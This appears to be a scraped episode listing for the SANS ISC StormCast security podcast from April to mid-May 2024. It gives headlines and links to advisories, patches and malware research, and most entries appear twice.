Why yq? Adventurs in XML https://isc.sans.edu/diary/Why%20yq%3F%20%20Adventures%20in%20XML/30930 Black Basta Uses Quick Assist https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/ Various Chrome 0-Day Vulnerabilities https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_15.html Android Theft Protection Improvement https://blog.google/products/android/android-theft-protection/ Critical Git Update https://github.blog/2024-05-14-securing-git-addressing-5-new-vulnerabilities/
5/17/20245 minutes, 21 seconds
Episode Artwork

ISC StormCast for Friday, May 17th, 2024

Why yq? Adventurs in XML https://isc.sans.edu/diary/Why%20yq%3F%20%20Adventures%20in%20XML/30930 Black Basta Uses Quick Assist https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/ Various Chrome 0-Day Vulnerabilities https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_15.html Android Theft Protection Improvement https://blog.google/products/android/android-theft-protection/ Critical Git Update https://github.blog/2024-05-14-securing-git-addressing-5-new-vulnerabilities/
5/17/20245 minutes, 21 seconds
Episode Artwork

ISC StormCast for Thursday, May 16th, 2024

Got MFA? If not, now is the time! https://isc.sans.edu/diary/Got%20MFA%3F%20%20If%20not%2C%20Now%20is%20the%20Time!/30926 SSID Confusion: Making Wi-Fi Clients Connect to the Wrong Network CVE-2023-52424 https://www.top10vpn.com/assets/2024/05/Top10VPN-x-Vanhoef-SSID-Confusion.pdf FIDO2 MitM Session Hijacking https://www.silverfort.com/blog/using-mitm-to-bypass-fido2/?web_view=true#but-first-some-background
5/16/20245 minutes, 31 seconds
Episode Artwork

ISC StormCast for Thursday, May 16th, 2024

Got MFA? If not, now is the time! https://isc.sans.edu/diary/Got%20MFA%3F%20%20If%20not%2C%20Now%20is%20the%20Time!/30926 SSID Confusion: Making Wi-Fi Clients Connect to the Wrong Network CVE-2023-52424 https://www.top10vpn.com/assets/2024/05/Top10VPN-x-Vanhoef-SSID-Confusion.pdf FIDO2 MitM Session Hijacking https://www.silverfort.com/blog/using-mitm-to-bypass-fido2/?web_view=true#but-first-some-background
5/16/20245 minutes, 31 seconds
Episode Artwork

ISC StormCast for Wednesday, May 15th, 2024

Microsoft Patches https://isc.sans.edu/diary/Microsoft%20May%202024%20Patch%20Tuesday/30920 Detecting Bluetooth Trackers https://security.googleblog.com/2024/05/google-and-apple-deliver-support-for.html Adobe Patches https://helpx.adobe.com/security/products/acrobat/apsb24-29.html VMWare Updates https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24280 Revoking Vulnerability Windows Boot Managers https://techcommunity.microsoft.com/t5/windows-it-pro-blog/revoking-vulnerable-windows-boot-managers/ba-p/4121735
5/15/20247 minutes, 33 seconds
Episode Artwork

ISC StormCast for Wednesday, May 15th, 2024

Microsoft Patches https://isc.sans.edu/diary/Microsoft%20May%202024%20Patch%20Tuesday/30920 Detecting Bluetooth Trackers https://security.googleblog.com/2024/05/google-and-apple-deliver-support-for.html Adobe Patches https://helpx.adobe.com/security/products/acrobat/apsb24-29.html VMWare Updates https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24280 Revoking Vulnerability Windows Boot Managers https://techcommunity.microsoft.com/t5/windows-it-pro-blog/revoking-vulnerable-windows-boot-managers/ba-p/4121735
5/15/20247 minutes, 33 seconds
Episode Artwork

ISC StormCast for Tuesday, May 14th, 2024

Apple Updates Everything https://isc.sans.edu/diary/Apple%20Patches%20Everything%3A%20macOS%2C%20iOS%2C%20iPadOS%2C%20watchOS%2C%20tvOS%20updated./30916 Juniper OpenSSH Update https://supportportal.juniper.net/s/article/2024-05-Reference-Advisory-Junos-OS-and-Junos-OS-Evolved-Multiple-CVEs-reported-in-OpenSSH?language=en_US Malicious Go Binary Delivered via Steganography in PyPi https://blog.phylum.io/malicious-go-binary-delivered-via-steganography-in-pypi/
5/14/20246 minutes, 16 seconds
Episode Artwork

ISC StormCast for Tuesday, May 14th, 2024

Apple Updates Everything https://isc.sans.edu/diary/Apple%20Patches%20Everything%3A%20macOS%2C%20iOS%2C%20iPadOS%2C%20watchOS%2C%20tvOS%20updated./30916 Juniper OpenSSH Update https://supportportal.juniper.net/s/article/2024-05-Reference-Advisory-Junos-OS-and-Junos-OS-Evolved-Multiple-CVEs-reported-in-OpenSSH?language=en_US Malicious Go Binary Delivered via Steganography in PyPi https://blog.phylum.io/malicious-go-binary-delivered-via-steganography-in-pypi/
5/14/20246 minutes, 16 seconds
Episode Artwork

ISC StormCast for Monday, May 13th, 2024

DNS Suffixes on Windows https://isc.sans.edu/diary/DNS%20Suffixes%20on%20Windows/30912 Black Basta Ransomware Advisory https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-131a Possible Exploitation of Arcserve Unified Data Protection Vuln https://digital.nhs.uk/cyber-alerts/2024/cc-4487 Chrome Patches 0-Day https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_9.html Solarwinds ARM Vulnerablities https://documentation.solarwinds.com/en/success_center/arm/content/release_notes/arm_2023-2-4_release_notes.htm
5/13/20245 minutes, 35 seconds
Episode Artwork

ISC StormCast for Monday, May 13th, 2024

DNS Suffixes on Windows https://isc.sans.edu/diary/DNS%20Suffixes%20on%20Windows/30912 Black Basta Ransomware Advisory https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-131a Possible Exploitation of Arcserve Unified Data Protection Vuln https://digital.nhs.uk/cyber-alerts/2024/cc-4487 Chrome Patches 0-Day https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_9.html Solarwinds ARM Vulnerablities https://documentation.solarwinds.com/en/success_center/arm/content/release_notes/arm_2023-2-4_release_notes.htm
5/13/20245 minutes, 35 seconds
Episode Artwork

ISC StormCast for Friday, May 10th, 2024

Analyzing PDF Streams https://isc.sans.edu/diary/Analyzing%20PDF%20Streams/30908 F5 Next Central Manager Vulnerabilities https://eclypsium.com/blog/big-vulnerabilities-in-next-gen-big-ip/ Veeam Patches https://www.veeam.com/kb4441 https://www.veeam.com/kb4509 Citrix Hypervisor Security Update CVE-2024-31497 https://support.citrix.com/article/CTX633416/citrix-hypervisor-security-update-for-cve202431497
5/10/20245 minutes, 53 seconds
Episode Artwork

ISC StormCast for Friday, May 10th, 2024

Analyzing PDF Streams https://isc.sans.edu/diary/Analyzing%20PDF%20Streams/30908 F5 Next Central Manager Vulnerabilities https://eclypsium.com/blog/big-vulnerabilities-in-next-gen-big-ip/ Veeam Patches https://www.veeam.com/kb4441 https://www.veeam.com/kb4509 Citrix Hypervisor Security Update CVE-2024-31497 https://support.citrix.com/article/CTX633416/citrix-hypervisor-security-update-for-cve202431497
5/10/20245 minutes, 53 seconds
Episode Artwork

ISC StormCast for Thursday, May 9th, 2024

Analzying Synology Disks https://isc.sans.edu/diary/Analyzing%20Synology%20Disks%20on%20Linux/30904 RSA Panel https://www.rsaconference.com/usa/agenda/session/The%20Five%20Most%20Dangerous%20New%20Attack%20Techniques%20You%20Need%20to%20Know%20About SANS.edu Research Journal https://www.sans.edu/cyber-security-research
5/9/20246 minutes, 9 seconds
Episode Artwork

ISC StormCast for Thursday, May 9th, 2024

Analzying Synology Disks https://isc.sans.edu/diary/Analyzing%20Synology%20Disks%20on%20Linux/30904 RSA Panel https://www.rsaconference.com/usa/agenda/session/The%20Five%20Most%20Dangerous%20New%20Attack%20Techniques%20You%20Need%20to%20Know%20About SANS.edu Research Journal https://www.sans.edu/cyber-security-research
5/9/20246 minutes, 9 seconds
Episode Artwork

ISC StormCast for Wednesday, May 8th, 2024

Detecting XFinity/Comcast DNS Spoofing https://isc.sans.edu/diary/Detecting%20XFinity%20Comcast%20DNS%20Spoofing/30898 Weblogic PoC CVE-2024-21006 https://pwnull.github.io/2024/oracle%20weblogic%20CVE-2024-21006%20Double-JNDInjection%20RCE%20analyze/ https://github.com/momika233/CVE-2024-21006 PDF.js React PDF Vulnerablity https://securityonline.info/cve-2024-4367-cve-2024-34342-javascript-flaw-threatens-millions-of-pdf-js-and-react-pdf-users/ Tinyproxy Response https://github.com/tinyproxy/tinyproxy/issues/533
5/8/20248 minutes, 13 seconds
Episode Artwork

ISC StormCast for Wednesday, May 8th, 2024

Detecting XFinity/Comcast DNS Spoofing https://isc.sans.edu/diary/Detecting%20XFinity%20Comcast%20DNS%20Spoofing/30898 Weblogic PoC CVE-2024-21006 https://pwnull.github.io/2024/oracle%20weblogic%20CVE-2024-21006%20Double-JNDInjection%20RCE%20analyze/ https://github.com/momika233/CVE-2024-21006 PDF.js React PDF Vulnerablity https://securityonline.info/cve-2024-4367-cve-2024-34342-javascript-flaw-threatens-millions-of-pdf-js-and-react-pdf-users/ Tinyproxy Response https://github.com/tinyproxy/tinyproxy/issues/533
5/8/20248 minutes, 13 seconds
Episode Artwork

ISC StormCast for Tuesday, May 7th, 2024

DHCP Based VPN Routing Leaks https://www.leviathansecurity.com/blog/tunnelvision Mullvad VPN DNS Traffic Leak https://mullvad.net/en/blog/dns-traffic-can-leak-outside-the-vpn-tunnel-on-android Tiny Proxy Vulnerability https://talosintelligence.com/vulnerability_reports/TALOS-2023-1889
5/7/20246 minutes, 27 seconds
Episode Artwork

ISC StormCast for Tuesday, May 7th, 2024

DHCP Based VPN Routing Leaks https://www.leviathansecurity.com/blog/tunnelvision Mullvad VPN DNS Traffic Leak https://mullvad.net/en/blog/dns-traffic-can-leak-outside-the-vpn-tunnel-on-android Tiny Proxy Vulnerability https://talosintelligence.com/vulnerability_reports/TALOS-2023-1889
5/7/20246 minutes, 27 seconds
Episode Artwork

ISC StormCast for Monday, May 6th, 2024

DNS Debugging with nslookup https://isc.sans.edu/diary/nslookups+Debug+Options/30894/ Microsoft Plans DNS Lockdown https://techcommunity.microsoft.com/t5/networking-blog/announcing-zero-trust-dns-private-preview/ba-p/4110366 Microsoft Graph API Abuse https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/graph-api-threats SANSFIRE SEC522 Defending Web Applications https://www.sans.org/cyber-security-training-events/sansfire-2024/
5/6/20245 minutes, 32 seconds
Episode Artwork

ISC StormCast for Monday, May 6th, 2024

DNS Debugging with nslookup https://isc.sans.edu/diary/nslookups+Debug+Options/30894/ Microsoft Plans DNS Lockdown https://techcommunity.microsoft.com/t5/networking-blog/announcing-zero-trust-dns-private-preview/ba-p/4110366 Microsoft Graph API Abuse https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/graph-api-threats SANSFIRE SEC522 Defending Web Applications https://www.sans.org/cyber-security-training-events/sansfire-2024/
5/6/20245 minutes, 32 seconds
Episode Artwork

ISC StormCast for Friday, May 3rd, 2024

https://isc.sans.edu/diary/Scans%20Probing%20for%20LB-Link%20and%20Vinga%20WR-AC1200%20routers%20CVE-2023-24796/30890 Scans Probing for LB-Link and Vinga WR-AC1200 routers CVE-2023-24796 Buffer Overflow Vulnerabilities in ArubaOS https://www.arubanetworks.com/support-services/security-bulletins/ The Cuttlefish Malware https://blog.lumen.com/eight-arms-to-hold-you-the-cuttlefish-malware/
5/3/20245 minutes, 33 seconds
Episode Artwork

ISC StormCast for Friday, May 3rd, 2024

https://isc.sans.edu/diary/Scans%20Probing%20for%20LB-Link%20and%20Vinga%20WR-AC1200%20routers%20CVE-2023-24796/30890 Scans Probing for LB-Link and Vinga WR-AC1200 routers CVE-2023-24796 Buffer Overflow Vulnerabilities in ArubaOS https://www.arubanetworks.com/support-services/security-bulletins/ The Cuttlefish Malware https://blog.lumen.com/eight-arms-to-hold-you-the-cuttlefish-malware/
5/3/20245 minutes, 33 seconds
Episode Artwork

ISC StormCast for Thursday, May 2nd, 2024

Linux Trojan - Xorddos with Filename eyshcjdmzg https://isc.sans.edu/diary/Linux%20Trojan%20-%20Xorddos%20with%20Filename%20eyshcjdmzg/30880 AWS S3 Denial of Wallet Amplification Attack https://medium.com/@maciej.pocwierz/how-an-empty-s3-bucket-can-make-your-aws-bill-explode-934a383cb8b1 https://blog.limbus-medtec.com/the-aws-s3-denial-of-wallet-amplification-attack-bc5a97cc041d EU iOS Safari Allows User Tracking https://www.mysk.blog/2024/04/28/safari-tracking/ BentoML Critical Deserialization Vuln CVE-2024-2912 https://nvd.nist.gov/vuln/detail/CVE-2024-2912
5/2/20246 minutes, 51 seconds
Episode Artwork

ISC StormCast for Thursday, May 2nd, 2024

Linux Trojan - Xorddos with Filename eyshcjdmzg https://isc.sans.edu/diary/Linux%20Trojan%20-%20Xorddos%20with%20Filename%20eyshcjdmzg/30880 AWS S3 Denial of Wallet Amplification Attack https://medium.com/@maciej.pocwierz/how-an-empty-s3-bucket-can-make-your-aws-bill-explode-934a383cb8b1 https://blog.limbus-medtec.com/the-aws-s3-denial-of-wallet-amplification-attack-bc5a97cc041d EU iOS Safari Allows User Tracking https://www.mysk.blog/2024/04/28/safari-tracking/ BentoML Critical Deserialization Vuln CVE-2024-2912 https://nvd.nist.gov/vuln/detail/CVE-2024-2912
5/2/20246 minutes, 51 seconds
Episode Artwork

ISC StormCast for Wednesday, May 1st, 2024

Another Day, Another NAS: Attacks against Zyxel NAS326 Devices CVE-2023-4473, CVE-2023-4474 https://isc.sans.edu/diary/Another%20Day%2C%20Another%20NAS%3A%20Attacks%20against%20Zyxel%20NAS326%20devices%20CVE-2023-4473%2C%20CVE-2023-4474/30884 R-Bitrary Code Execution: Vulnearbility in R's Deserialization https://hiddenlayer.com/research/r-bitrary-code-execution/ Coordinated Docker Hub Attacks using Malicious Repositories https://jfrog.com/blog/attacks-on-docker-with-millions-of-malicious-repositories-spread-malware-and-phishing-scams/ NVMe-oF/TCP Vulnerabilities https://www.cyberark.com/resources/threat-research-blog/your-nvme-had-been-syzed-fuzzing-nvme-of-tcp-driver-for-linux-with-syzkaller
5/1/20246 minutes, 38 seconds
Episode Artwork

ISC StormCast for Wednesday, May 1st, 2024

Another Day, Another NAS: Attacks against Zyxel NAS326 Devices CVE-2023-4473, CVE-2023-4474 https://isc.sans.edu/diary/Another%20Day%2C%20Another%20NAS%3A%20Attacks%20against%20Zyxel%20NAS326%20devices%20CVE-2023-4473%2C%20CVE-2023-4474/30884 R-Bitrary Code Execution: Vulnearbility in R's Deserialization https://hiddenlayer.com/research/r-bitrary-code-execution/ Coordinated Docker Hub Attacks using Malicious Repositories https://jfrog.com/blog/attacks-on-docker-with-millions-of-malicious-repositories-spread-malware-and-phishing-scams/ NVMe-oF/TCP Vulnerabilities https://www.cyberark.com/resources/threat-research-blog/your-nvme-had-been-syzed-fuzzing-nvme-of-tcp-driver-for-linux-with-syzkaller
5/1/20246 minutes, 38 seconds
Episode Artwork

ISC StormCast for Tuesday, April 30th, 2024

DLink NAS Exploit Variation https://www.qnap.com/en/security-advisory/qsa-24-09 Muddling Meerkat DNS Abuse https://blogs.infoblox.com/threat-intelligence/a-cunning-operator-muddling-meerkat-and-chinas-great-firewall/ Android TV Data Leakage https://www.youtube.com/watch?v=QiyBXXO8QpA https://www.404media.co/android-tvs-can-expose-user-email-inboxes/ SEC522: SANSFIRE https://www.sans.org/cyber-security-courses/application-security-securing-web-apps-api-microservices/ SEC522 Demo (requires free account): https://www.sans.org/ondemand/get-demo/316
4/30/20246 minutes, 55 seconds
Episode Artwork

ISC StormCast for Tuesday, April 30th, 2024

DLink NAS Exploit Variation https://www.qnap.com/en/security-advisory/qsa-24-09 Muddling Meerkat DNS Abuse https://blogs.infoblox.com/threat-intelligence/a-cunning-operator-muddling-meerkat-and-chinas-great-firewall/ Android TV Data Leakage https://www.youtube.com/watch?v=QiyBXXO8QpA https://www.404media.co/android-tvs-can-expose-user-email-inboxes/ SEC522: SANSFIRE https://www.sans.org/cyber-security-courses/application-security-securing-web-apps-api-microservices/ SEC522 Demo (requires free account): https://www.sans.org/ondemand/get-demo/316
4/30/20246 minutes, 55 seconds
Episode Artwork

ISC StormCast for Monday, April 29th, 2024

Okta warns of increase in credential stuffing https://sec.okta.com/blockanonymizers Fake payment cards used by Police in Japan https://twitter.com/vxunderground/status/1783522097425211887 Phishing Campaigns Targeting USPS https://www.akamai.com/blog/security-research/phishing-usps-malicious-domains-traffic-equal-to-legitimate-traffic Chrome 124 Breaks TLS Handshake https://www.reddit.com/r/sysadmin/comments/1carvpd/chrome_124_breaks_tls_handshake/
4/29/20246 minutes, 36 seconds
Episode Artwork

ISC StormCast for Monday, April 29th, 2024

Okta warns of increase in credential stuffing https://sec.okta.com/blockanonymizers Fake payment cards used by Police in Japan https://twitter.com/vxunderground/status/1783522097425211887 Phishing Campaigns Targeting USPS https://www.akamai.com/blog/security-research/phishing-usps-malicious-domains-traffic-equal-to-legitimate-traffic Chrome 124 Breaks TLS Handshake https://www.reddit.com/r/sysadmin/comments/1carvpd/chrome_124_breaks_tls_handshake/
4/29/20246 minutes, 36 seconds
Episode Artwork

ISC StormCast for Friday, April 26th, 2024

Does it matter if iptables isn't running on my honeypot? https://isc.sans.edu/forums/diary/Does%20it%20matter%20if%20iptables%20isn't%20running%20on%20my%20honeypot%3F/30862/ Unplugging PlugX: Singholing the PlugX USB worm botnet https://blog.sekoia.io/unplugging-plugx-sinkholing-the-plugx-usb-worm-botnet/ pfSense Updates https://docs.netgate.com/advisories/index.html GitLab Updates https://about.gitlab.com/releases/2024/04/24/patch-release-gitlab-16-11-1-released/ Matthew Alan Vorhees: Prevention Strategies for Modern Living Off the Land Usage https://www.sans.edu/cyber-research/prevention-strategies-modern-living-off-land-usage/
4/26/202420 minutes, 28 seconds
Episode Artwork

ISC StormCast for Friday, April 26th, 2024

Does it matter if iptables isn't running on my honeypot? https://isc.sans.edu/forums/diary/Does%20it%20matter%20if%20iptables%20isn't%20running%20on%20my%20honeypot%3F/30862/ Unplugging PlugX: Singholing the PlugX USB worm botnet https://blog.sekoia.io/unplugging-plugx-sinkholing-the-plugx-usb-worm-botnet/ pfSense Updates https://docs.netgate.com/advisories/index.html GitLab Updates https://about.gitlab.com/releases/2024/04/24/patch-release-gitlab-16-11-1-released/ Matthew Alan Vorhees: Prevention Strategies for Modern Living Off the Land Usage https://www.sans.edu/cyber-research/prevention-strategies-modern-living-off-land-usage/
4/26/202420 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, April 25th, 2024

API Rug Pull - The NIST NVD Database and API https://isc.sans.edu/diary/API%20Rug%20Pull%20-%20The%20NIST%20NVD%20Database%20and%20API%20%28Part%204%20of%203%29/30868 Cisco Patches Vulnerabilities and Discovers Arcane Backdoor https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/ Vulnerabilities across keyboard apps reveal keystrokes to network eavesdroppers https://citizenlab.ca/2024/04/vulnerabilities-across-keyboard-apps-reveal-keystrokes-to-network-eavesdroppers/ MySQL2: Dangers of User-Defined Database Connections https://blog.slonser.info/posts/mysql2-attacker-configuration/ Netgear Nighthawk Vulnerabilities https://jvn.jp/en/vu/JVNVU91883072/
4/25/20246 minutes, 9 seconds
Episode Artwork

ISC StormCast for Thursday, April 25th, 2024

API Rug Pull - The NIST NVD Database and API https://isc.sans.edu/diary/API%20Rug%20Pull%20-%20The%20NIST%20NVD%20Database%20and%20API%20%28Part%204%20of%203%29/30868 Cisco Patches Vulnerabilities and Discovers Arcane Backdoor https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/ Vulnerabilities across keyboard apps reveal keystrokes to network eavesdroppers https://citizenlab.ca/2024/04/vulnerabilities-across-keyboard-apps-reveal-keystrokes-to-network-eavesdroppers/ MySQL2: Dangers of User-Defined Database Connections https://blog.slonser.info/posts/mysql2-attacker-configuration/ Netgear Nighthawk Vulnerabilities https://jvn.jp/en/vu/JVNVU91883072/
4/25/20246 minutes, 9 seconds
Episode Artwork

ISC StormCast for Wednesday, April 24th, 2024

Struts2 devmode Still a Problem Ten Years Later https://isc.sans.edu/forums/diary/Struts%20%22devmode%22%3A%20Still%20a%20problem%20ten%20years%20later%3F/30866/ Analyzing Forest Blizard's Custom Post-Compromise Tool for exploiting CVE-2022-38028 https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/ April 2024 Exchange Server Hotfix Update https://techcommunity.microsoft.com/t5/exchange-team-blog/released-april-2024-exchange-server-hotfix-updates/ba-p/4120536 CVE-2024-2389: Command Injection Vulnerability in Progress Flowmon https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/ GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining https://decoded.avast.io/janrubin/guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining/
4/24/20246 minutes, 22 seconds
Episode Artwork

ISC StormCast for Wednesday, April 24th, 2024

Struts2 devmode Still a Problem Ten Years Later https://isc.sans.edu/forums/diary/Struts%20%22devmode%22%3A%20Still%20a%20problem%20ten%20years%20later%3F/30866/ Analyzing Forest Blizard's Custom Post-Compromise Tool for exploiting CVE-2022-38028 https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/ April 2024 Exchange Server Hotfix Update https://techcommunity.microsoft.com/t5/exchange-team-blog/released-april-2024-exchange-server-hotfix-updates/ba-p/4120536 CVE-2024-2389: Command Injection Vulnerability in Progress Flowmon https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/ GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining https://decoded.avast.io/janrubin/guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining/
4/24/20246 minutes, 22 seconds
Episode Artwork

ISC StormCast for Tuesday, April 23rd, 2024

Number of Industrial Devices Accessible From Internet Up 30 Thousand over three years https://isc.sans.edu/diary/It%20appears%20that%20the%20number%20of%20industrial%20devices%20accessible%20from%20the%20internet%20has%20risen%20by%2030%20thousand%20over%20the%20past%20three%20years/30860 Evil XDR: Turning an XDR into an Offensive Tool https://www.darkreading.com/application-security/evil-xdr-researcher-turns-palo-alto-software-into-perfect-malware GitLab Comment Bug https://www.bleepingcomputer.com/news/security/gitlab-affected-by-github-style-cdn-flaw-allowing-malware-hosting/ SEC522 Demo: https://www.sans.org/ondemand/get-demo/316
4/23/20246 minutes, 5 seconds
Episode Artwork

ISC StormCast for Tuesday, April 23rd, 2024

Number of Industrial Devices Accessible From Internet Up 30 Thousand over three years https://isc.sans.edu/diary/It%20appears%20that%20the%20number%20of%20industrial%20devices%20accessible%20from%20the%20internet%20has%20risen%20by%2030%20thousand%20over%20the%20past%20three%20years/30860 Evil XDR: Turning an XDR into an Offensive Tool https://www.darkreading.com/application-security/evil-xdr-researcher-turns-palo-alto-software-into-perfect-malware GitLab Comment Bug https://www.bleepingcomputer.com/news/security/gitlab-affected-by-github-style-cdn-flaw-allowing-malware-hosting/ SEC522 Demo: https://www.sans.org/ondemand/get-demo/316
4/23/20246 minutes, 5 seconds
Episode Artwork

ISC StormCast for Monday, April 22nd, 2024

The CVE's They are A-Changing https://isc.sans.edu/diary/The%20CVE%27s%20They%20are%20A-Changing!/30850 CrushFTP 0-Day Vulnerability https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update https://www.reddit.com/r/crowdstrike/comments/1c88788/situational_awareness_20240419_crushftp_virtual/ GitHub Comment Bug Used to Distribute Malware https://www.bleepingcomputer.com/news/security/github-comments-abused-to-push-malware-via-microsoft-repo-urls/ YubiKey Manager Privilege Escalation https://www.yubico.com/support/security-advisories/ysa-2024-01/ Palo Alto Networks GlobalProtect Update https://security.paloaltonetworks.com/CVE-2024-3400
4/22/20245 minutes, 36 seconds
Episode Artwork

ISC StormCast for Monday, April 22nd, 2024

The CVE's They are A-Changing https://isc.sans.edu/diary/The%20CVE%27s%20They%20are%20A-Changing!/30850 CrushFTP 0-Day Vulnerability https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update https://www.reddit.com/r/crowdstrike/comments/1c88788/situational_awareness_20240419_crushftp_virtual/ GitHub Comment Bug Used to Distribute Malware https://www.bleepingcomputer.com/news/security/github-comments-abused-to-push-malware-via-microsoft-repo-urls/ YubiKey Manager Privilege Escalation https://www.yubico.com/support/security-advisories/ysa-2024-01/ Palo Alto Networks GlobalProtect Update https://security.paloaltonetworks.com/CVE-2024-3400
4/22/20245 minutes, 36 seconds
Episode Artwork

ISC StormCast for Friday, April 19th, 2024

Delinea Secret Server Authn Authz Bypass https://straightblast.medium.com/all-your-secrets-are-belong-to-us-a-delinea-secret-server-authn-authz-bypass-adc26c800ad3 Ivanti Avalanche Poc/Details https://www.tenable.com/security/research/tra-2024-10 Advanced Phishing Campaign https://www.lookout.com/threat-intelligence/article/cryptochameleon-fcc-phishing-kit Hashicorp go-getter update CVE-2024-3817 https://discuss.hashicorp.com/t/hcsec-2024-09-hashicorp-go-getter-vulnerable-to-argument-injection-when-fetching-remote-default-git-branches/66040 OfflRouter Virus https://blog.talosintelligence.com/offlrouter-virus-causes-upload-confidential-documents-to-virustotal/
4/19/20245 minutes, 6 seconds
Episode Artwork

ISC StormCast for Friday, April 19th, 2024

Delinea Secret Server Authn Authz Bypass https://straightblast.medium.com/all-your-secrets-are-belong-to-us-a-delinea-secret-server-authn-authz-bypass-adc26c800ad3 Ivanti Avalanche Poc/Details https://www.tenable.com/security/research/tra-2024-10 Advanced Phishing Campaign https://www.lookout.com/threat-intelligence/article/cryptochameleon-fcc-phishing-kit Hashicorp go-getter update CVE-2024-3817 https://discuss.hashicorp.com/t/hcsec-2024-09-hashicorp-go-getter-vulnerable-to-argument-injection-when-fetching-remote-default-git-branches/66040 OfflRouter Virus https://blog.talosintelligence.com/offlrouter-virus-causes-upload-confidential-documents-to-virustotal/
4/19/20245 minutes, 6 seconds
Episode Artwork

ISC StormCast for Thursday, April 18th, 2024

Malicious PDF File As Delivery Mechanism https://isc.sans.edu/diary/Malicious%20PDF%20File%20Used%20As%20Delivery%20Mechanism/30848 Updated Palo Alto Networks GlobalProtect Guidance https://security.paloaltonetworks.com/CVE-2024-3400 Coordinated Social Engineering Takeovers of Open Source Projects; https://openssf.org/blog/2024/04/15/open-source-security-openssf-and-openjs-foundations-issue-alert-for-social-engineering-takeovers-of-open-source-projects/ OpenMetaData Attacks https://www.microsoft.com/en-us/security/blog/2024/04/17/attackers-exploiting-new-critical-openmetadata-vulnerabilities-on-kubernetes-clusters/
4/18/20245 minutes, 19 seconds
Episode Artwork

ISC StormCast for Thursday, April 18th, 2024

Malicious PDF File As Delivery Mechanism https://isc.sans.edu/diary/Malicious%20PDF%20File%20Used%20As%20Delivery%20Mechanism/30848 Updated Palo Alto Networks GlobalProtect Guidance https://security.paloaltonetworks.com/CVE-2024-3400 Coordinated Social Engineering Takeovers of Open Source Projects; https://openssf.org/blog/2024/04/15/open-source-security-openssf-and-openjs-foundations-issue-alert-for-social-engineering-takeovers-of-open-source-projects/ OpenMetaData Attacks https://www.microsoft.com/en-us/security/blog/2024/04/17/attackers-exploiting-new-critical-openmetadata-vulnerabilities-on-kubernetes-clusters/
4/18/20245 minutes, 19 seconds
Episode Artwork

ISC StormCast for Wednesday, April 17th, 2024

Palo Alto Networks GlobalProtect exploit public and widely exploited CVE-2024-3400 https://isc.sans.edu/forums/diary/Palo%20Alto%20Networks%20GlobalProtect%20exploit%20public%20and%20widely%20exploited%20CVE-2024-3400/30844/ Putty Private Key Recovery https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-p521-bias.html Oracle Critical Patch Update https://www.oracle.com/security-alerts/cpuapr2024.html Ivanti Avalanche MDM Patches https://forums.ivanti.com/s/article/Avalanche-6-4-3-Security-Hardening-and-CVEs-addressed?language=en_US
4/17/20245 minutes, 33 seconds
Episode Artwork

ISC StormCast for Wednesday, April 17th, 2024

Palo Alto Networks GlobalProtect exploit public and widely exploited CVE-2024-3400 https://isc.sans.edu/forums/diary/Palo%20Alto%20Networks%20GlobalProtect%20exploit%20public%20and%20widely%20exploited%20CVE-2024-3400/30844/ Putty Private Key Recovery https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-p521-bias.html Oracle Critical Patch Update https://www.oracle.com/security-alerts/cpuapr2024.html Ivanti Avalanche MDM Patches https://forums.ivanti.com/s/article/Avalanche-6-4-3-Security-Hardening-and-CVEs-addressed?language=en_US
4/17/20245 minutes, 33 seconds
Episode Artwork

ISC StormCast for Tuesday, April 16th, 2024

Quick Palo Alto Networks Global Protect Vulnerablity Update CVE-2024-3400 https://isc.sans.edu/diary/30838 Delinea patches critical vulnerability in secret manager https://trust.delinea.com/?tcuUid=17aaf4ef-ada9-46d5-bf97-abd3b07daae3 Lancom Windows Setup Assistant May Reset Password https://www.lancom-systems.com/service-support/general-security-information PHP Patches https://seclists.org/oss-sec/2024/q2/113 Duo SMS and VoiP Logs Leaked https://app.securitymsp.cisco.com/e/es?e=2785&eid=opguvrs&elq=bd1c1886a59e40c09915b029a74be94e Lastpass Stops Deepfake Attack https://blog.lastpass.com/posts/2024/04/attempted-audio-deepfake-call-targets-lastpass-employee
4/16/20246 minutes, 17 seconds
Episode Artwork

ISC StormCast for Tuesday, April 16th, 2024

